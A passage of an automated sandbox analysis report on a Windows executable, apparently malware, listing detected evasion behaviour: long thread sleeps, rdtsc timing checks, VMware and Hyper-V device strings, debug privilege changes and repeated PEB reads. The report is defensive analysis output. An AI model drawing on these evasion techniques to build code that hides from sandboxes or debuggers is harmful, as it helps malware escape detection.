          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exe TID: 6896Thread sleep time: -41202s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exe TID: 6972Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 4700Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D6B90 rdtsc 3_2_010D6B90
          Source: C:\Users\user\Desktop\535276_86376.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeAPI coverage: 7.0 %
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeThread delayed: delay time: 41202Jump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000002.661294806.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.434224007.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000006.00000000.434224007.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.654795903.0000000004437000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.434224007.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000002.667197807.000000000F069000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.542815797.000000000F02E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622792306.000000000F068000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.545036149.000000000F02E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.623960541.000000000F068000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
          Source: explorer.exe, 00000006.00000000.424757327.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000006.00000002.661294806.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D6B90 rdtsc 3_2_010D6B90
          Source: C:\Users\user\Desktop\535276_86376.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9100 mov eax, dword ptr fs:[00000030h]3_2_010A9100
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C4120 mov eax, dword ptr fs:[00000030h]3_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C4120 mov ecx, dword ptr fs:[00000030h]3_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D513A mov eax, dword ptr fs:[00000030h]3_2_010D513A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D513A mov eax, dword ptr fs:[00000030h]3_2_010D513A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB944 mov eax, dword ptr fs:[00000030h]3_2_010CB944
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB944 mov eax, dword ptr fs:[00000030h]3_2_010CB944
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AC962 mov eax, dword ptr fs:[00000030h]3_2_010AC962
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AB171 mov eax, dword ptr fs:[00000030h]3_2_010AB171
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AB171 mov eax, dword ptr fs:[00000030h]3_2_010AB171
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DA185 mov eax, dword ptr fs:[00000030h]3_2_010DA185
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CC182 mov eax, dword ptr fs:[00000030h]3_2_010CC182
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2990 mov eax, dword ptr fs:[00000030h]3_2_010D2990
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011251BE mov eax, dword ptr fs:[00000030h]3_2_011251BE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D61A0 mov eax, dword ptr fs:[00000030h]3_2_010D61A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D61A0 mov eax, dword ptr fs:[00000030h]3_2_010D61A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011649A4 mov eax, dword ptr fs:[00000030h]3_2_011649A4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011649A4 mov eax, dword ptr fs:[00000030h]3_2_011649A4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011649A4 mov eax, dword ptr fs:[00000030h]3_2_011649A4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011649A4 mov eax, dword ptr fs:[00000030h]3_2_011649A4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov eax, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov eax, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov eax, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov ecx, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF mov eax, dword ptr fs:[00000030h]3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011269A6 mov eax, dword ptr fs:[00000030h]3_2_011269A6
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AB1E1 mov eax, dword ptr fs:[00000030h]3_2_010AB1E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011341E8 mov eax, dword ptr fs:[00000030h]3_2_011341E8
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01174015 mov eax, dword ptr fs:[00000030h]3_2_01174015
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01174015 mov eax, dword ptr fs:[00000030h]3_2_01174015
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01127016 mov eax, dword ptr fs:[00000030h]3_2_01127016
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D002D mov eax, dword ptr fs:[00000030h]3_2_010D002D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BB02A mov eax, dword ptr fs:[00000030h]3_2_010BB02A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA830 mov eax, dword ptr fs:[00000030h]3_2_010CA830
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA830 mov eax, dword ptr fs:[00000030h]3_2_010CA830
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA830 mov eax, dword ptr fs:[00000030h]3_2_010CA830
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA830 mov eax, dword ptr fs:[00000030h]3_2_010CA830
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C0050 mov eax, dword ptr fs:[00000030h]3_2_010C0050
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C0050 mov eax, dword ptr fs:[00000030h]3_2_010C0050
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01171074 mov eax, dword ptr fs:[00000030h]3_2_01171074
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01162073 mov eax, dword ptr fs:[00000030h]3_2_01162073
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9080 mov eax, dword ptr fs:[00000030h]3_2_010A9080
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01123884 mov eax, dword ptr fs:[00000030h]3_2_01123884
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01123884 mov eax, dword ptr fs:[00000030h]3_2_01123884
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E90AF mov eax, dword ptr fs:[00000030h]3_2_010E90AF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A0 mov eax, dword ptr fs:[00000030h]3_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DF0BF mov ecx, dword ptr fs:[00000030h]3_2_010DF0BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DF0BF mov eax, dword ptr fs:[00000030h]3_2_010DF0BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DF0BF mov eax, dword ptr fs:[00000030h]3_2_010DF0BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0113B8D0 mov eax, dword ptr fs:[00000030h]3_2_0113B8D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A58EC mov eax, dword ptr fs:[00000030h]3_2_010A58EC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB8E4 mov eax, dword ptr fs:[00000030h]3_2_010CB8E4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CB8E4 mov eax, dword ptr fs:[00000030h]3_2_010CB8E4
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A40E1 mov eax, dword ptr fs:[00000030h]3_2_010A40E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A40E1 mov eax, dword ptr fs:[00000030h]3_2_010A40E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A40E1 mov eax, dword ptr fs:[00000030h]3_2_010A40E1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA309 mov eax, dword ptr fs:[00000030h]3_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116131B mov eax, dword ptr fs:[00000030h]3_2_0116131B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010ADB40 mov eax, dword ptr fs:[00000030h]3_2_010ADB40
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01178B58 mov eax, dword ptr fs:[00000030h]3_2_01178B58
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AF358 mov eax, dword ptr fs:[00000030h]3_2_010AF358
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010ADB60 mov ecx, dword ptr fs:[00000030h]3_2_010ADB60
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D3B7A mov eax, dword ptr fs:[00000030h]3_2_010D3B7A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D3B7A mov eax, dword ptr fs:[00000030h]3_2_010D3B7A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B1B8F mov eax, dword ptr fs:[00000030h]3_2_010B1B8F
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B1B8F mov eax, dword ptr fs:[00000030h]3_2_010B1B8F
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115D380 mov ecx, dword ptr fs:[00000030h]3_2_0115D380
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D2397 mov eax, dword ptr fs:[00000030h]3_2_010D2397
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116138A mov eax, dword ptr fs:[00000030h]3_2_0116138A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DB390 mov eax, dword ptr fs:[00000030h]3_2_010DB390
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D4BAD mov eax, dword ptr fs:[00000030h]3_2_010D4BAD
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01175BA5 mov eax, dword ptr fs:[00000030h]3_2_01175BA5
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011253CA mov eax, dword ptr fs:[00000030h]3_2_011253CA
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011253CA mov eax, dword ptr fs:[00000030h]3_2_011253CA
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CDBE9 mov eax, dword ptr fs:[00000030h]3_2_010CDBE9
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D03E2 mov eax, dword ptr fs:[00000030h]3_2_010D03E2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011523E3 mov ecx, dword ptr fs:[00000030h]3_2_011523E3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011523E3 mov ecx, dword ptr fs:[00000030h]3_2_011523E3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011523E3 mov eax, dword ptr fs:[00000030h]3_2_011523E3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116AA16 mov eax, dword ptr fs:[00000030h]3_2_0116AA16
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116AA16 mov eax, dword ptr fs:[00000030h]3_2_0116AA16
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B8A0A mov eax, dword ptr fs:[00000030h]3_2_010B8A0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C3A1C mov eax, dword ptr fs:[00000030h]3_2_010C3A1C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A5210 mov ecx, dword ptr fs:[00000030h]3_2_010A5210
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A5210 mov eax, dword ptr fs:[00000030h]3_2_010A5210
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AAA16 mov eax, dword ptr fs:[00000030h]3_2_010AAA16
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AAA16 mov eax, dword ptr fs:[00000030h]3_2_010AAA16
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E4A2C mov eax, dword ptr fs:[00000030h]3_2_010E4A2C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E4A2C mov eax, dword ptr fs:[00000030h]3_2_010E4A2C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA229 mov eax, dword ptr fs:[00000030h]3_2_010CA229
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116EA55 mov eax, dword ptr fs:[00000030h]3_2_0116EA55
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01134257 mov eax, dword ptr fs:[00000030h]3_2_01134257
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A9240 mov eax, dword ptr fs:[00000030h]3_2_010A9240
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E927A mov eax, dword ptr fs:[00000030h]3_2_010E927A
